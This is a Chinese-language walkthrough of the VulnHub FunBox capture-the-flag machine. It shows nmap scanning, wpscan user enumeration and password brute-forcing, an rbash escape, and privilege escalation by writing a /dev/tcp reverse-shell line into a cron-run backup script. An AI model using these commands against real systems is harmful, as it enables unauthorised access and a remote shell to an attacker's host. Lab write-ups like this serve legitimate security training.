![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/3a15a5b7f3ae434e87cc466ccefeab68.jpg "VulnHub_FunBox[通俗易懂]插图")
发现目标主机
我们使用nmap扫描整个网段
sudo nmap 192.168.1.0/24
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/b6597131a80746d08598fcfb84c4b8a3.jpg "VulnHub_FunBox[通俗易懂]插图2")
扫描端口
使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口
sudo nmap -A 192.168.1.14
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/fb92c5953ca64b98a33f1886794ec87b.jpg "VulnHub_FunBox[通俗易懂]插图4")
使用IP访问时发现会跳转到funbox.fritz.box域名,我们需要再hosts文件中加入映射关系才能正常访问![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/5118d6470f5e4434ae3125aba1415f2c.jpg "VulnHub_FunBox[通俗易懂]插图6")
添加之后通过域名访问发现这是一个WordPress搭建的网站![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/723663fb70304b73b81482fea2e41f72.jpg "VulnHub_FunBox[通俗易懂]插图8")
我们先用wpscan扫描一下用户,得到admin和joe两个用户
sudo wpscan --url http://funbox.fritz.box/ --enumerate u
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/48083aef58d14123b1182bf01f7ecc4f.jpg "VulnHub_FunBox[通俗易懂]插图10")
我们创建一个用户字典然后进行密码爆破
sudo wpscan --url http://funbox.fritz.box/ -U ~/Desktop/VulnHub/FunBox/username -P /usr/share/wordlists/rockyou.txt
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/d7565c1909ab4e5f8a6a920af3c46a2c.jpg "VulnHub_FunBox[通俗易懂]插图12")
得到密码之后,由于服务器开放了22端口,我们先连接服务器试试
ssh joe@192.168.1.14
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/696f6576ce114ef9b0de5b229f165936.jpg "VulnHub_FunBox[通俗易懂]插图14")
我们发现joe用户可以成功连接到服务器
但是,当我们想切换到其他目录的时候,发现这是一个受限的rbash![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/182a1aa16d1c4a999d776604161a5343.jpg "VulnHub_FunBox[通俗易懂]插图16")
使用bash -i即可绕过限制![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/76515a3e9b04437bbc635a8d6f41ca59.jpg "VulnHub_FunBox[通俗易懂]插图18")
我们查看joe家目录下的mbox文件发现了一句提示语,在funny的家目录下有一个备份脚本,让我们告诉他完成了。
Hi Joe, please tell funny the backupscript is done.
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/47cef65036e04580a621a9c1f3155626.jpg "VulnHub_FunBox[通俗易懂]插图20")
进入funny的家目录我们发现本脚本是一个隐藏文件![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/4becdbb94a6d4168be36eeddd2826a1f.jpg "VulnHub_FunBox[通俗易懂]插图22")
查看脚本内容即是将var/www/html备份到funny的家目录下![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/5980a83c44694c80a34b060ef5c875da.jpg "VulnHub_FunBox[通俗易懂]插图24")
查看了一下时间发现文件最后修改时间和现在时间进行对比,这应该是一个定时执行的脚本![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/527d4077f62642b1b83883c9ed5d5d12.jpg "VulnHub_FunBox[通俗易懂]插图26")
通过观察脚本差不多2-5分钟执行一次,我们在脚本里写入一个反弹shell
bash -i >& /dev/tcp/192.168.1.6/1234 0>&1
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/9244625f79054a0c95184da99b036890.jpg "VulnHub_FunBox[通俗易懂]插图28")
等几分钟即可返回一个shell![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/d80d6a92bac948bfa238d2af14c54a5f.jpg "VulnHub_FunBox[通俗易懂]插图30")
通过观察funny权限脚本1分钟执行一次,root权限5分钟执行一次,所以如果返回的不是root权限可以多试几次
查看Flag![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/6a9e6eb9006b431ba64e76d7919fb184.jpg "VulnHub_FunBox[通俗易懂]插图32")
福利来啦
加入我的星球
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/5483e70f00c64d059a3cef7ff11ede6a.jpg "VulnHub_FunBox[通俗易懂]插图34")
下方查看历史文章
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/794712289927407eb4923b40699ab7de.jpg "VulnHub_FunBox[通俗易懂]插图36")
VulnHub之DC-1
VulnHub之DC-2
VulnHub之DC-3
VulnHub之DC-4
VulnHub之MuzzyBox
【工具分享】AWVS 12 汉化激活成功教程版
通达OA任意上传&文件包含漏洞复现
扫描二维码
获取更多精彩
NowSec
![VulnHub_FunBox[通俗易懂]](https://img.mushiming.top/app/bianchenghao_cn/b26b746d3ed74f07b7fd93bd3f85776c.jpg "VulnHub_FunBox[通俗易懂]插图38")
今天的文章VulnHub_FunBox[通俗易懂]分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/57942.html
